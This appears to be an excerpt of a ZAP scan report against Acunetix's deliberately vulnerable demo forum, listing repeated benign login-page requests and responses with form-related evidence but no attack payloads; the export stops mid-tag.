GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a 